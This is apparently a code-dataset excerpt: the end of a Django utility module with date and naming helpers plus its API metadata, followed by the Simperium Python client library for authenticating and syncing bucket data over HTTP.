'biz_cc_id' in conditions:\n conditions.update(business__cc_id=conditions.pop('biz_cc_id'))\n if not isinstance(conditions, dict):\n message = u\"params conditions[%s] are invalid dict data\" % conditions\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n # check that the given group_by key is valid\n if group_by not in group_by_check:\n message = u\"params group_by[%s] is invalid\" % group_by\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n # biz_cc_id needs to be renamed\n # to avoid exposing the foreign key lookup\n if group_by == 'biz_cc_id':\n group_by = 'business__cc_id'\n result_dict['success'] = True\n result_dict['group_by'] = group_by\n result_dict['conditions'] = conditions\n return result_dict\n\n\ndef convert_group_name(biz_cc_id, role):\n return '%s\\x00%s' % (biz_cc_id, role)\n\n\ndef camel_case_to_underscore_naming(source):\n \"\"\"\n Convert a camel-case string to underscore (snake-case) form.\n :param source:\n :return:\n \"\"\"\n if not isinstance(source, six.string_types):\n return source\n result = ''\n for i, s in enumerate(source):\n if i == 0:\n result += s.lower()\n else:\n if s.isupper():\n if source[i - 1].islower():\n result += '_' + s.lower()\n else:\n result += s.lower()\n else:\n result += s\n return result\n\n\ndef gen_day_dates(start_time, days):\n \"\"\"\n Yield every date between start_time and start_time + days.\n :param start_time: start time\n :param days: number of days\n :return:\n \"\"\"\n day = datetime.timedelta(days=1)\n for index in range(days):\n yield start_time + day * index\n\n\n
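# Worked examples for the date helpers in this module (comment-only; datetime is imported at module top):\n#\n# list(gen_day_dates(datetime.datetime(2019, 1, 30), 3)) yields Jan 30, Jan 31 and Feb 1.\n#\n# add_months(datetime.datetime(2019, 12, 15), 1):\n#     month = 12 - 1 + 1 = 12; year = 2019 + 12 // 12 = 2020; month = 12 % 12 + 1 = 1\n#     -> datetime.datetime(2020, 1, 15)\n# Caveat: dt.replace() raises ValueError when the target month is shorter than dt.day (e.g. adding one month to Jan 31).\n\n\n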
def get_month_dates(start_time, end_time):\n \"\"\"\n Get every month between two dates.\n :param start_time: start time\n :param end_time: end time\n :return:\n \"\"\"\n out_dates = []\n # when start_time is the last day of its month, an extra day must be added\n _, last_day = calendar.monthrange(start_time.year, start_time.month)\n if last_day == start_time.day:\n start_time += datetime.timedelta(days=1)\n while start_time <= end_time:\n date_str = start_time.strftime('%Y-%m')\n if date_str not in out_dates:\n out_dates.append(date_str)\n start_time = add_months(start_time, 1)\n return out_dates\n\n\ndef add_months(dt, months):\n \"\"\"\n Add N months to a datetime.\n :param dt: start time\n :param months: number of months to add\n :return:\n \"\"\"\n month = dt.month - 1 + months\n year = dt.year + month // 12\n month = month % 12 + 1\n return dt.replace(year=year, month=month)\n", "sub_path": "gcloud/core/utils/sites/open/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 22154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "gcloud.conf.settings.ESB_GET_CLIENT_BY_USER", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 45, "usage_type": "name"}, {"api_name": "gcloud.conf.settings.DEFAULT_CACHE_TIME_FOR_CC", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 47, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 59, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 59, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 77, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 79, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 79, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 82, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 82, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 84, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 84, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 102, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 102, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_user_info", "line_number": 104, "usage_type": "call"}, {"api_name": "django.core.cache.cache.set", "line_number": 109, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 109, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 111, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 111, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 114, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 114, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 116, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 116, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 132, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 132, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 134, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 134, "usage_type": "name"}, 
{"api_name": "gcloud.exceptions.Forbidden", "line_number": 150, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 150, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 153, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 153, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 156, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 156, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 158, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 158, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 164, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 164, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 173, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 173, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 177, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 177, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 180, "usage_type": "call"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 181, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 183, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 183, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 195, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 195, "usage_type": "name"}, {"api_name": "gcloud.core.roles.ALL_ROLES", "line_number": 200, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 202, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 202, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 202, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 207, "usage_type": "call"}, {"api_name": "gcloud.core.roles.ADMIN_ROLES", "line_number": 210, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 210, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 211, "usage_type": "call"}, {"api_name": "django.db.transaction.atomic", "line_number": 213, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 213, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.select_for_update", "line_number": 215, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 215, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.DoesNotExist", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 216, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 
219, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 219, "usage_type": "name"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 232, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 232, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 232, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP.get", "line_number": 238, "usage_type": "call"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 238, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 238, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 240, "usage_type": "call"}, {"api_name": "gcloud.core.roles.FUNCTOR", "line_number": 244, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 244, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_operate_user_list", "line_number": 245, "usage_type": "call"}, {"api_name": "gcloud.core.roles.AUDITOR", "line_number": 248, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 248, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_auditor_user_list", "line_number": 249, "usage_type": "call"}, {"api_name": "django.core.cache.cache.set", "line_number": 257, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 257, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.all", "line_number": 264, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 264, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 264, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 265, "usage_type": "call"}, {"api_name": "gcloud.core.roles.AUDITOR", "line_number": 269, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 269, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 270, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 270, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 274, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 276, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 276, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 286, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 286, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.update_or_create", "line_number": 297, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 297, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 297, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 304, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 304, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.adapt_get_user_data", "line_number": 310, "usage_type": 
"call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 311, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 320, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 320, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_user_info", "line_number": 323, "usage_type": "call"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 327, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 327, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 329, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 329, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 331, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 331, "usage_type": "name"}, {"api_name": "gcloud.conf.settings.ESB_AUTH_COMPONENT_SYSTEM", "line_number": 332, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 332, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 337, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 337, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.is_user_functor", "line_number": 343, "usage_type": "call"}, {"api_name": "gcloud.core.api_adapter.is_user_auditor", "line_number": 343, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects.filter", "line_number": 347, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 347, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 347, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 349, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 349, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 357, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 357, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP.values", "line_number": 371, "usage_type": "call"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 371, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 371, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 381, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 381, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 382, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 382, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 382, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 404, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.DoesNotExist", "line_number": 405, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 405, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.update_or_create", "line_number": 409, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 409, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 409, "usage_type": "name"}, {"api_name": 
"django.core.cache.cache.set", "line_number": 424, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 424, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 437, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 437, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 438, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 438, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 441, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 441, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 441, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.DoesNotExist", "line_number": 442, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 442, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 492, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.timezone.localtime", "line_number": 497, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 497, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 510, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime.fromtimestamp", "line_number": 525, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 525, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 525, "usage_type": "name"}, {"api_name": "pytz.utc", "line_number": 525, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.is_aware", "line_number": 540, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 540, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 541, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 541, "usage_type": "name"}, {"api_name": "gcloud.core.constant.AE.group_list", "line_number": 545, "usage_type": "attribute"}, {"api_name": "gcloud.core.constant.AE", "line_number": 545, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 557, "usage_type": "call"}, {"api_name": "django.utils.six.string_types", "line_number": 596, "usage_type": "attribute"}, {"api_name": "django.utils.six", "line_number": 596, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 620, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 634, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 636, "usage_type": "call"}]} +{"seq_id": "531504317", "text": "import os\nimport uuid\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nimport requests\n\n\nclass Auth(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import Auth\n >>> auth = Auth('myapp', 'cbbae31841ac4d44a93cd82081a5b74f')\n >>> Auth.create('john@company.com', 'secret123')\n 'db3d2a64abf711e0b63012313d001a3b'\n \"\"\"\n\n def __init__(\n self,\n appname: str,\n api_key: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n ) -> None:\n \"\"\"\n Inits the Auth class.\n \"\"\"\n if not host:\n host = 
os.environ.get(\"SIMPERIUM_AUTHHOST\", \"auth.simperium.com\")\n self.appname = appname\n self.api_key = api_key\n self.host = host\n self.scheme = scheme\n\n def _build_url(self, endpoint: str) -> str:\n return \"{}://{}/1/{}\".format(self.scheme, self.host, endpoint)\n\n def create(self, username: str, password: str) -> Optional[str]:\n \"\"\"\n Create a new user with `username` and `password`.\n Returns the user access token if successful, or raises an error\n otherwise.\n \"\"\"\n\n data = {\"username\": username, \"password\": password}\n headers = {\"X-Simperium-API-Key\": self.api_key}\n\n url = self._build_url(self.appname + \"/create/\")\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n return r.json().get(\"access_token\")\n\n def authorize(self, username: str, password: str) -> str:\n \"\"\"\n Get the access token for a user.\n Returns the access token as a string or raises an error on failure.\n \"\"\"\n data = {\"username\": username, \"password\": password}\n headers = {\"X-Simperium-API-Key\": self.api_key}\n\n url = self._build_url(self.appname + \"/authorize/\")\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n return r.json()[\"access_token\"]\n\n\nclass Bucket(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import Bucket\n >>> bucket = Bucket('myapp', 'db3d2a64abf711e0b63012313d001a3b', 'mybucket')\n >>> bucket.set('item2', {'age': 23})\n True\n >>> bucket.set('item2', {'age': 25})\n True\n >>> bucket.get('item2')\n {'age': 25}\n >>> bucket.get('item2', version=1)\n {'age': 23}\n \"\"\"\n\n BATCH_DEFAULT_SIZE = 100\n\n def __init__(\n self,\n appname: str,\n auth_token: str,\n bucket: str,\n userid: Optional[str] = None,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n\n if not host:\n host = os.environ.get(\"SIMPERIUM_APIHOST\", \"api.simperium.com\")\n\n self.userid = userid\n self.host = host\n self.scheme = scheme\n self.appname = appname\n self.bucket = bucket\n self.auth_token = auth_token\n if clientid:\n self.clientid = clientid\n else:\n self.clientid = \"py-%s\" % uuid.uuid4().hex\n\n def _auth_header(self) -> Dict[str, str]:\n headers = {\"X-Simperium-Token\": \"%s\" % self.auth_token}\n if self.userid:\n headers[\"X-Simperium-User\"] = self.userid\n return headers\n\n def _gen_ccid(self) -> str:\n return uuid.uuid4().hex\n\n def _build_url(self, endpoint: str) -> str:\n return \"{}://{}/1/{}\".format(self.scheme, self.host, endpoint)\n\n def index(\n self,\n data: bool = False,\n mark: Optional[str] = None,\n limit: Optional[int] = None,\n since: Optional[str] = None,\n ) -> Dict[Any, Any]:\n \"\"\"\n retrieve a page of the latest versions of a buckets documents\n ordered by most the most recently modified.\n\n @mark: mark the documents returned to be modified after the\n given cv\n @limit: limit page size to this number. max 1000, default 100.\n @since: limit page to documents changed since the given cv.\n @data: include the current data state of each document in the\n result. by default data is not included.\n\n returns: {\n 'current': head cv of the most recently modified document,\n 'mark': cv to use to pull the next page of documents. 
def get(\n self, item: str, default: Any = None, version: Optional[int] = None\n ) -> Union[Any, Dict[Any, Any]]:\n \"\"\"\n Retrieves either the latest version of item from this bucket, or the\n specific version requested.\n Returns `default` on a 404, raises error on http error\n\n `version` should be an integer > 0\n \"\"\"\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n\n r = requests.get(url, headers=self._auth_header())\n if r.status_code == 404:\n return default\n r.raise_for_status()\n\n return r.json()\n\n def post(\n self,\n item: str,\n data: Dict[Any, Any],\n version: Optional[int] = None,\n ccid: Optional[str] = None,\n include_response: bool = False,\n replace: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n \"\"\"\n Posts the supplied data to `item`.\n\n If `include_response` is True, returns a tuple of (`item`, the json\n response). Otherwise, returns `item`.\n\n `version` should be an integer > 0\n \"\"\"\n ccid = ccid if ccid else self._gen_ccid()\n\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n\n params = {\n \"clientid\": self.clientid,\n \"ccid\": ccid,\n \"response\": 1 if include_response else None,\n \"replace\": 1 if replace else None,\n }\n\n r = requests.post(url, json=data, headers=self._auth_header(), params=params)\n r.raise_for_status()\n if include_response:\n return item, r.json()\n else:\n return item\n\n def bulk_post(\n self, bulk_data: Dict[Any, Any], wait: bool = True\n ) -> Union[bool, Dict[Any, Any]]:\n \"\"\"\n posts multiple items at once, bulk_data should be a map like:\n\n { \"item1\" : { data1 },\n \"item2\" : { data2 },\n ...\n }\n\n returns an array of change responses (check for error codes)\n \"\"\"\n changes_list = []\n for itemid, data in list(bulk_data.items()):\n change = {\"id\": itemid, \"o\": \"M\", \"v\": {}, \"ccid\": self._gen_ccid()}\n # manually construct jsondiff, equivalent to jsondiff.diff( {}, data )\n for k, v in list(data.items()):\n change[\"v\"][k] = {\"o\": \"+\", \"v\": v}\n\n changes_list.append(change)\n\n url = \"%s/%s/changes\" % (self.appname, self.bucket)\n url = self._build_url(url)\n params = {\"clientid\": self.clientid}\n params[\"wait\"] = \"1\"\n\n r = requests.post(\n url, json=changes_list, headers=self._auth_header(), params=params\n )\n r.raise_for_status()\n\n if not wait:\n # changes successfully submitted - check /changes\n return True\n\n # check each change response for 'error'\n return r.json()\n\n 
def new(\n self,\n data: Dict[Any, Any],\n ccid: Optional[str] = None,\n include_response: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.post(\n uuid.uuid4().hex, data, ccid=ccid, include_response=include_response\n )\n\n def set(\n self,\n item: str,\n data: Dict[Any, Any],\n version: Optional[int] = None,\n ccid: Optional[str] = None,\n include_response: bool = False,\n replace: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.post(\n item,\n data,\n version=version,\n ccid=ccid,\n include_response=include_response,\n replace=replace,\n )\n\n def delete(self, item: str, version: Optional[int] = None) -> Optional[str]:\n \"\"\"\n Deletes the item from bucket.\n Returns the ccid if the response body is empty (success), otherwise None.\n\n `version` should be an integer > 0\n \"\"\"\n ccid = self._gen_ccid()\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n params = {\"clientid\": self.clientid, \"ccid\": ccid}\n r = requests.delete(url, headers=self._auth_header(), params=params)\n r.raise_for_status()\n if not r.text.strip():\n return ccid\n return None\n\n def changes(self, cv=None, timeout=None):\n \"\"\"\n retrieves updates for this bucket for this user\n\n @cv: if supplied only updates that occurred after this\n change version are retrieved.\n\n @timeout: the call will wait for updates if none are immediately\n available. by default it will wait indefinitely. if a timeout\n is supplied an empty list will be returned if no updates are made\n before the timeout is reached.\n \"\"\"\n url = \"%s/%s/changes\" % (self.appname, self.bucket)\n url = self._build_url(url)\n params = {\"clientid\": self.clientid}\n if cv is not None:\n params[\"cv\"] = cv\n headers = self._auth_header()\n r = requests.get(url, headers=headers, timeout=timeout, params=params)\n r.raise_for_status()\n return r.json()\n\n
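# Comment-only sketch: tailing this bucket's change feed with the cv cursor (hypothetical usage; assumes, per the Simperium API docs, that each change dict carries a 'cv' key to resume from; apply_change() is a placeholder):\n #\n # cv = None\n # while True:\n #     for change in bucket.changes(cv=cv, timeout=300):\n #         apply_change(change)\n #         cv = change['cv']\n\n 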
def all(\n self,\n cv: Optional[str] = None,\n data: bool = False,\n username: bool = False,\n most_recent: bool = False,\n timeout: Optional[int] = None,\n skip_clientids: List[str] = [],\n batch: Optional[int] = None,\n ) -> Union[List[Any], Dict[Any, Any]]:\n \"\"\"\n retrieves *all* updates for this bucket, regardless of the user\n which made the update.\n\n @cv: if supplied only updates that occurred after this\n change version are retrieved.\n\n @data: if True, also include the latest version of the data for\n each changed entity\n\n @username: if True, also include the username that created the\n change\n\n @most_recent: if True, then only the most recent change for each\n document in the current page will be returned. e.g. if a\n document has been recently changed 3 times, only the latest of\n those 3 changes will be returned.\n\n @timeout: the call will wait for updates if none are immediately\n available. by default it will wait indefinitely. if a timeout\n is supplied an empty list will be returned if no updates are made\n before the timeout is reached.\n \"\"\"\n url = \"%s/%s/all\" % (self.appname, self.bucket)\n url = self._build_url(url)\n\n params = {\n \"clientid\": self.clientid,\n \"cv\": cv,\n \"skip_clientid\": skip_clientids,\n \"batch\": str(batch) if batch is not None else str(self.BATCH_DEFAULT_SIZE),\n \"username\": \"1\" if username else None,\n \"data\": \"1\" if data else None,\n \"most_recent\": \"1\" if most_recent else None,\n }\n headers = self._auth_header()\n r = requests.get( # type: ignore\n url, headers=headers, timeout=timeout, params=params\n )\n r.raise_for_status()\n return r.json()\n\n\nclass SPUser(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import SPUser\n >>> user = SPUser('myapp', 'db3d2a64abf711e0b63012313d001a3b')\n >>> user.post({'age': 23})\n True\n >>> user.get()\n {'age': 23}\n \"\"\"\n\n def __init__(\n self,\n appname: str,\n auth_token: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n\n self.bucket = Bucket(\n appname, auth_token, \"spuser\", host=host, scheme=scheme, clientid=clientid\n )\n\n def get(self) -> Dict[Any, Any]:\n return self.bucket.get(\"info\")\n\n def post(\n self, data: Dict[Any, Any]\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.bucket.post(\"info\", data)\n\n\nclass Api(object):\n def __init__(\n self,\n appname: str,\n auth_token: str,\n userid: Optional[str] = None,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n self.appname = appname\n self.token = auth_token\n self.userid = userid\n self.host = host\n self.scheme = scheme\n self.clientid = clientid\n\n def __getattr__(self, name: str) -> Union[SPUser, Bucket]:\n return Api.__getitem__(self, name)\n\n def __getitem__(self, name: str) -> Union[SPUser, Bucket]:\n if name.lower() == \"spuser\":\n return SPUser(\n self.appname,\n self.token,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n return Bucket(\n self.appname,\n self.token,\n name,\n userid=self.userid,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n\n\nclass Admin(Api):\n def __init__(\n self,\n appname: str,\n admin_token: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n self.appname = appname\n self.token = admin_token\n self.host = host\n self.scheme = scheme\n self.clientid = clientid\n\n def as_user(self, userid: str) -> Api:\n return Api(\n self.appname,\n self.token,\n userid=userid,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n", "sub_path": "simperium/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 15266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.Optional", "line_number": 22, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 62, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 91, "usage_type": "name"}, {"api_name": "typing.Optional", 
